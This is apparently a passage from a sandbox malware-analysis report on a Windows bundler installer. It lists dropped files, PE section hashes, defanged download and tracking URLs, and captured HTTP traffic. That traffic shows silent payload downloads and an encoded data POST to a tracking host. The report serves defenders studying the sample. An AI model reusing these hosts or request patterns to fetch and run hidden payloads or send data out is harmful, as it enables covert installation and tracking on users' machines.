    %Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca.part (16744 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[2] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\XwPLangqfnEVNV[1].ca (16664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1980\images\progressbar.gif (15 bytes)
    %Program Files%\Chime\Chime.dat (5 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text40962894722897925.223260b29ab3ccbc000e05e55a97d0cfb232d
.rdata29491218878189443.30236729772da64321bbeffad66bb1b3e1d38
.data3153921428041320962.086652ccbe851032a092ba4bbf57df05bb72d
.rsrc45875216120163844.22721699f51992a29975ccec7d79727813e0b
.reloc475136678471683.47446fd43122d257222321aa1ceb2a0ee72a3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://linq-goody-best.xyz/hp/?q=XDOtvcE+9jE/sqMztvXFjnV0Q9S5QAWSoMFJVLK2BupEE8V7TCpqJoGq/iUeUKvbvmDwEpIGujfPRivaynoO9il//gnTI+akMQhfaElhTWusj5ht3kdqYS0gcmr8lJRjyYajy0WmpJYzt8V1hGGJd6bu1v1Wjq6fQOF0vAXOLe0aIPkSZPKdnETmEH0PtwjHTGUMXNiBdiO7KPOOSY8c/Dvf5mTLc05Yr1a5uwXIQgSoV30s915myZ8+GZD2/5iQxW6ZCDtTnWb5vPL/R0cB3VtBtXt++aiHLFtYt9rxpIMJS30soMfKTAbZNbyO4WGAc4gMuLVlHX4yIkVjv+6VAlvUM54.68.13.248
hxxp://r1.mytholiday.com/54.69.32.99
hxxp://goldavid.com/?e=whcop&sfx=2&cht=0&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=054.68.254.5
hxxp://r1.mytholiday.com/?step_id=2&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=054.69.32.99
hxxp://goldavid.com/?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=054.68.254.5
hxxp://r1.mytholiday.com/?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=054.69.32.99
hxxp://goldavid.com/?e=dnkp&dd=23&emnum=53&jc=1&sfx=2&ams=6&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&cha=054.68.254.5
hxxp://r1.mytholiday.com/?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=054.69.32.99
hxxp://storestral.com/?e=nnnbvv&publisher=&&dd=3&ind=5459321632979031863&exid=%UpdateInfo_ExternalID&bijo=1&ssd=7757455632247121954&hid=12802899647634509424&osid=501&sfx=2&jc=1&cha=054.149.75.132
hxxp://r1.mytholiday.com/?step_id=5&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=054.69.32.99
hxxp://storestral.com/?e=ressal&sfx=2&cht=0&dd=5&cid=599&vn=159&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=054.149.75.132
hxxp://r1.mytholiday.com/?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=054.69.32.99
hxxp://c1.storesis.com/?step_id=5&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=054.69.32.99
hxxp://c1.storesis.com/?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=054.69.32.99
hxxp://c1.storesis.com/?step_id=2&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=054.69.32.99
hxxp://softwareziip.info/?e=dnkp&dd=23&emnum=53&jc=1&sfx=2&ams=6&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&cha=054.68.254.5
hxxp://loveshero.net/?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=054.68.254.5
hxxp://c1.storesis.com/?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=054.69.32.99
hxxp://c1.storesis.com/?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=054.69.32.99

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /?e=ressal&sfx=2&cht=0&dd=5&cid=599&vn=159&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: storestral.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:46 GMT

Content-Type: application/octet-stream

Content-Length: 246135

Connection: close

Content-Disposition: attachment; filename="XwPLangqfnEVNV.ca"

Content-Transfer-Encoding: binary

Access-Control-Allow-Origin: *

..z.s....9Z........k....dD..dD......^.$.l.......v.h.^.).U..A...%.3..m.p.w......g._.g.].@u.....q.R..;.i.~._......t.}.VK.7.o.z.S..2...p.y.Z}.e.M...'..3...j.E.M<...^.u.V..-...&.J..4...c.y.RQ.)...<.F..(...g.}.^Q.....1.B..'...y.D.M-.B.P.,....V.z.6....|...|.g.Z$.(...v.G..*...3....h.....|....c.^...-..'.]...c.&V.6.l.i....l.@.-...>-.l.L. .L..Z.P.`.T.\2.P...".E..5...l.].Ej.H.4.5.\N.R.N.*....0.V...r..<.8...q.J..!...&.@.[L...[.9....v.}......y.U.a.'.N..;...w.H..=.I.p.e..c...B.a.T..f.....V.G(.....m.U..).....R..,...e.m.Q9.o.G.}.2..(.Y.%..../.....'....x.......Yh.......Q,.J...(....f.G......v.j.J.r.R..n...v.F.YM...].c.J..z...;.P.E?...t.}.@2. ...<.\..2.O.h...M". ...a.J..W...o.V.[3.G...p.@..".Y.`.<..*.....w.40.;...|.... .^.&.6........&....{.`.t.X.Q-.....-....v...a.K..u.M.7.2.9..a...}.*..(.Y.%..../.....'....x.......Yd.....{.TA./.....D..>...a...P\. ...<.N..i...}....*.....q.R..5.....B.]=.....o.N#.9...~.N..Y...c.k._?.|...>.X..6.L.d.'.I......p.@..".V.n.A..8.....w..3.;...r.M..$...-.}.^d.....c.B..,...k.A.Zr...X.6....w.|......z.Z.b. .M~.:...v.Z..c... ....n.O.t......b.B.j.X.Ev.....~.Qc.......]..-.L.a.z.F1.$.Q.p.K..4.K.)....f.m.u.-....e...a.^.S ...g.x..d.7.T.z.S..2...|.d..k.k.V.{.A..o.K.=...37.......D..:...k.^..k.I.5.4.]M.U.M.5....1...~.s..?.....v.I..2.I.'....d.k.w.#....k...p....".q.w.f."!.:...v.I..0...w.G.XK...r.r....u.Y.$. .7".W.K. .SO.S.I.i.\..5.\.a.z.B1.$.[.p.K..&...#.C.\I.....9.R..q...q...] .w.u.`..h.9.....S..~.^. .v.TL.d.\.&....;...d.7.I......o.K..v.F.#.N..D.\.$....". ...|....6...&.s..?.......L..F...s.Q.Q-..

<<< skipped >>>

POST / HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: r1.mytholiday.com

Content-Length: 3756

Cache-Control: no-cache

data=KlKoj7SOOXXPYSUMOQaak&report=LrcYUNeDfGeclBotvqQjOCkHvfmyW35 ilZTgk5s4OurWxUKlGaGFT/gViZ6fU/ KQoqmDHf t0nZE0D7tBm0O4yFkfggJnJY1U2hGE8OeU0sW3FxeAuI7wuIk6u6Z5k5HQe3IOCNv9croWS46/bPFRuTo4COD6JuHAUFQEj8Lplqx5zbWq3kX31JDpnF6 m3AOOiFEFGCZNoAl0yWB8tda57ofh687ARHaIqDsSwINy9Cw7K9ukxIFAlnY9LIjwqhILXO2fCsYPyYizaYtN L/ajGCP1J1zj3fhJQMbIZuoIwEQMZ4gNzrgz6uCBFDBjycb6wgvcLgmwzWvo8FSen1mYXltqtv2XKqb5DtPKUmd8fOaE0IWxE2yh8YzV1m8VRPKpPeDCyKVwK4qC3iF1F CqdEup1JwonXt TsukkoRVDxpr0KOA3zpUT5aXnMzkpeZt/urTinhwKze2MvCDtDgYOuyeyWfkrzw15gigj/qO4CL1dpNodsx9dS1I8yIpwmDzAoNUk FzmI1SF/Z/i2ovWMMGgW5yGaE6W2UQxcTjQyXMa iztypcQX56gntlvsjU7IuP/myFE58vrYns0jrIaSDwIJEQn QcRLyd5IJgAkslSdXbQwPiJ82Cc9TQalGbr9HrbySfTOomzSZVJ1fCmD6St6iFQOLoglBpdRsDfgsklkw3ypKNApvaPnX5d7dBcv4HjmUpAP0 0WGonSoeSJnrtAsvajjwoJQNtuGvNtF2IGyG2K8mBx/Gaa I1rplUsaJNbZSxJt/311vHvCRSUog1HeFd7RcatechXK5DH7NtuPl6KmUcsDna m65l1nJBhDoZKGN8Tx/3Qyp/Mo Qevk1TlAdos9wSNcR/N0anngSE0AMQED fWo0HO3746k7roNaAYC0EBtYj6rFy91Qo75FLcsyp9X5b5pwCJmx1apomL326wDdjwvxfbt7MFoyJjhxNcY214yYZg9l4ooNhMc2CjOQQ/w HuolShQhErKaLj VTRXws3K7qYkYDF6Z mwu56VcA2eND5nr2kNEJZKp7slM0oy7KhHUXffOzxBmaWPscgPUGKjE4xNwIL9/NwLzsoZPfTOEY9NZfg5I2qzLBxh4kU9gZsoQBt3V3eYDcwZkilzEKIkeG8v9C1hxYMuODWs ZIhdyYPCFpcUsbbEBZPcZUhzMqc8N4JjKbmOZRZwIyQNdgu5lmB6TW2UOBI42r0Y/VvmaxOICqnO 8t7HYallKzwDkFNoYsATz7/VVtIu07

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:30 GMT

Content-Type: application/json; charset=UTF-8

Content-Length: 2

Connection: close

{}..

GET /?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.storesis.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:25 GMT

Content-Type: text/html

Content-Length: 9774

Connection: close

Content-Disposition: attachment; filename="3.txt"

..g.v.Y.G.f.M.O.I.J./.u.V.q.p.H.G. .x.R.7./.W.d.9.J.k.0.y.W.x.I.B.y.k.4.X.F.i.C.x.9.o.9.q.O.M.J.M.9.X.s.o.B.m.n.s.Z.f.M.r.F.B.y.M.3.z.j.1.T.Y./.H.N.L.B.T.N.B.c.9.m.R.J.t.6.d.c.T.9.9.H.V.M.f.Z.g.o.z.n. .4.3.8.B.D.z.3.3.n.k.Y.j.r.k.B.s.S.4.X.S.A.h.M.K.T.B.z.j.u.I.u.C.s.M.M.w.d.q.V.9. .c.T.V.A.5.c.t.s.c.3.s.2.Q.w.F.M.4.p.S.m.G.a.w./.M.C.V.G.4.B.O.h.d.3.2.M.b.t.i.y.b.j.D.v.k.U.X.u.h.l.Y.m.E.0.t.Y.I.s.L.h.Z.g.e.i.Q.J.O.j./.w.b.H.W.H.F.A.R.F.x.P.8.P.E.c.q.m.n.g.q.i.m.9.B.e.I.H.L.r.O.T.3.d.U.T.E.2.m.k.p.S.e.E.X.U.g.2.T.X.u.D. .L.0.X.V.2.6.N.t.N.i.O.H.N.R.a.N.V.Z.m.a.X.i.W.8.f.E.b.c.5.o.7.O.X.0.Q.j.u.h./.1.Z.g.X.d.f.i.B.5.z.v.c.l.H.V.T.5.8.5.E.j.1.W.s.k.i.C.o.s.Q.a.G.R.7.A.m./.4.K.k.W.T.j.l.T.G.A.I.g.T.X.0.o.R. .0.S.b.Y.c.g.i.Z.N.3.a.f.F.X.d.x.R.K.q.U.I.7.5.5.V.T.c.N.M.8.u.F.q.P.A. .h.n.X.I.Y.e.7.L.8.I.W.v.T.q.j.L.T.M.v.l.J.U.q.r.S.8.g.6.d.t.u.9.5.r.K.a.s.y.I.i.5.M.9.x.A.s.e.v.E.O.u.1.I.Q.p.P.y.I.5.s.s.5.k.s.U.k.d.H.4.9.f.E.N.I.x.U.M.p.1.4.d.f.h.C.3.X.d.z.0.I.s.C.o.4.M.j.Z.U.d.2.H.U.Y.s.N.x.9.N.I.L.t.U.V.E.a.g.D.r.Q.m.W.N.P.a.H.l.0.U.b.X.O.I.t.f.l.t.7.f.d.z.V.8.N.l./.t.g.y.V.2.f.z.p.Z.R./.p.4.7.z.t.G.u.I.d.n.l.E.d.s.U.N.x.b.P.k.2.G.2.d.w.k.N.X.Q.k.M.S.C.R.u.L.K.K.W.6.H.T.Y.U.C.D.0.0.4.G.A.t.B.F.B.O.i.l.m.J.l.3. . .k.a.r.O. .5.6.o.Q.g. .z.X.F.z.y.W.U.3.o.4.2.r.N.Q.J.K.r.5.3.n.G.P.U.v.a.e.e.j./.D.M.4.x.e.e.5.3.m.G.L.U.y.R.X.b.i.V.i.k.B.h.b.W.B.w.S.x.N.w.u.P.u.m.5.h.q.R.2.N.4.n./.I.y.3.7.r.z.b.v.e.E.2.R.i.g.M.h.f.6.c.e.6.u.J.u.k.L.P.t.V.T.D.8.5.W.B.E.Z.J.C.O.l.A.K.k.T.o. .f.P.I.j.P.e.U./.N.J.1.n.Z.1.s.c./.S.p.n.P.7.E.8.c.

<<< skipped >>>

GET /?step_id=2&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.storesis.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:16 GMT

Content-Type: text/html

Content-Length: 9746

Connection: close

Content-Disposition: attachment; filename="2.txt"

..U.9. .l.h.C.D.U.1.L.y.X.W.Z.m.u.r.p. .q.L.C.h.s.1.F.x.7.q.j.H.l.f.Q.c.a. .P./.L.Z.D.T.z.J.Q.G.z.I. .v.l.G.W.K.R.s.j.y.n.h.a.2.N.o.f.C.Z.y.V.7.z.1.j.W.D.l.y.N.W.N.d.B./.U.y.m.j.i.v.i.y.K.S.u.C.H.g.R.V.2.G.y. .7.p. .L.y.t.H.n.W.s.e.A.G.q.m./.t.r.M.f.A.j.2.I.s.A.v.q.2.R.b.H.O.8.I.o.c.h.Q.W.6.M.9.I.C.U.S.H.q.p.t.t.9./.N.7.a.b.0.F.D. .J.p.6.i.t.C.p.c.h.N. .D.c.S.l.A.b.O.p.O.7.y.s.l.Z.e.j.D.u.j.q.r.r.B.O./.3.L.Z.t. .k.J.n.q.r.e.r.Z.I.3.p.M.g.J.4.7.3.Z.r.o.s.f.G.8.C.e.T.V.O.Q.Q.A.w.A.1.N.N.o.i.f.b.n.g.H.4.J.A.p.N.Z.S.S.S.o.Z.F.2.h.t.G.G.a.m.S.F.I.d.C.i.W.9.L.j.8.B.I.X.2.6.E. .D.i.l.e.0. . .R.M.O.p.k.U.L.R.B.d.e.T.q.D.M.o.F.1.O.f.m.4.7.7.V.f.t.9.C.5.W.A.S.J.k.g.H.i.V.n.z.w.j.q.g.H.p.8.J.U.g.O.N.L.8.e.q.V.i.z.L.6.W.W.5./.X.N.M.k.9.w.Q.x.3.0.y.y.A.k.Q.H.m.a.2.E./.4.E.e.j.H.x.t.9.A.i.t.3.q.9.k.Q.4.R.T.f.J.v.g.F.W.0.g.p.d.7.9.Q.T.L.h.R.c.k.c.C.S.0.2.A.Y.D.P.i.p.y.4.n.u.o.C.n.l.N.F.O. .2.n.7.c.j.m.4.c.7.9.W.x.I.H.I.M.5.H.A. .Q.p.T.O.o.7.d.5.g.W.q.V.d.1.L.q.C.5.t.7.Z.r.t.c.6.e.J. .t.z.J.J.o.F.B.D.g.G.r.U.b.r. ./.H.Z.c.p.v.k.3.6.a.b.p.N.4.w.L.a.C.B.w.v.1.i.u.N.Y./.P.T.1.B.O.P.r.0.I.4. .b.z.o.H.7.4.5.w.a.n.G.I./.B.6.f.L.m.D.0.A.Z.y.a.o.y.n.o.n.J.F.X.G.l.c.8.L.I.q.o.Z.X.D.M.o.V.x./.T.S.8.A.R.z.Q.y.W.Y.V.7.7.X.H.O.J.M.G.s./.7.2.u.y.D.7.H.p.o.N.2.X.M.M.w. .g.b.F.W.n.t.b.X.B.G.z.0.x.N.Z.q.H.T.n.V.2.F.j.q./.N.g.I.S.3.q.n.U.X.9.Y.0.g.g.c.b.j.I.g.M.5.3.D.G.C.R.S. .7.a.2.4.8.2.2.A.T.q.E.L.d. .G.o.X.h.f.3.N.i.I.v.N.f.x.P.W.V.W.V.a.J.G.L.T.m.G.r.4.f.t.j.z.l. .E.5.5.g.v.B.P.V. .H.8.f.W.i.0.m.x.w.Y.A.q.0.N.j.U.5.w.K.9.J.M.D.u.X.6.K.B./.

<<< skipped >>>

GET /?e=dnkp&dd=23&emnum=53&jc=1&sfx=2&ams=6&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&cha=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: softwareziip.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:27 GMT

Content-Type: application/octet-stream

Content-Length: 450664

Connection: close

Content-Disposition: attachment; filename="Oo8yOHF14wFvBA.ca"

Content-Transfer-Encoding: binary

Access-Control-Allow-Origin: *

..z.d...........sUAo....,....d.......kA.\........d..].....&..p.........../D.N..^...P.A? ....qt...\.....8..hnlX.P..OYt.45.Yi.J..........p.?9....\V15..>.............N.>....^..c....Tl..K.<.%.5N.!._O...p.oa.......b@nV.*Q........o.qm..;..L(.Wp.2-.6..9..c..........t...\;.98.XH...1.y..Gn..\.o.h.....L.....-.Y........]..@....8%......O.f]..}~..S..Y......@5}.z..........[*.....7b..e..l..Z.u..;....H.=D...Z.aO...5.Q|......#.t..........Y.A.$M7G....{Vrdw.|..n...A.r..n.^Lg...2]...T.5.JJ.D75....^(.m..f..|....n._...2U.G..8.. @..2.V.....R."...N.].82.."......3....q.{.........W.6.u......H..i.!2.s.zF.Q...G...&Z.. ..b..".W,.....V...4..-o(..?......a...U....WH..../mD.R%jcq......E...Q.m..$H.....[.$1....w*.P...?{..O..!B1..MX.C.B..J ...%.s..WQ...B.L..9.....MVF..hA$...r....-'*...\..k..D.......U....c.....%...\...Y%.h....OtR..0G......;.E...*l..r..h^.=.....^ .3.=..8l...r....d..(.T.....bR3S.Z.6......rj..u..[.h,),.R..;...d....H..L.....:t...z..#.|4vW..y..9.Hn.vB...}..o..#.%.....g..d...j.;..r.(.^....cy....../>..a.<..X.k.......&-..vFw.[;'..'L.*-.O. .............R... .j...g.m...?.efy..g..>....#.......z..pp.*.... ...M'@2.h...Pq-]T5.I.V..>.#)<.0...'...T?.....=..U......m.}..?..,..t../.R.=..\..%..d.. ..U...[.....l?..F..K.a.z...8n.#..U.[6'....0.`...[.".t..o5..}.......k..Re$..Og...........z.....n..?...4..h.P..W@..TW.q.-.3.).|*.Y.....E.....zP].;..0h{.}.,%(...........f..L.....Qx.....&..|....9.W.$...L..no..[..3...R.8.......:.5....]..D|. Ht.?....,{..... ....'K_O.QE{.n..r.....g6|..kh.E5.>:.4......M...] .. .I.\.[.......$....;..d..O.!.

<<< skipped >>>

GET /?step_id=5&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.storesis.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:45 GMT

Content-Type: text/html

Content-Length: 9922

Connection: close

Content-Disposition: attachment; filename="5.txt"

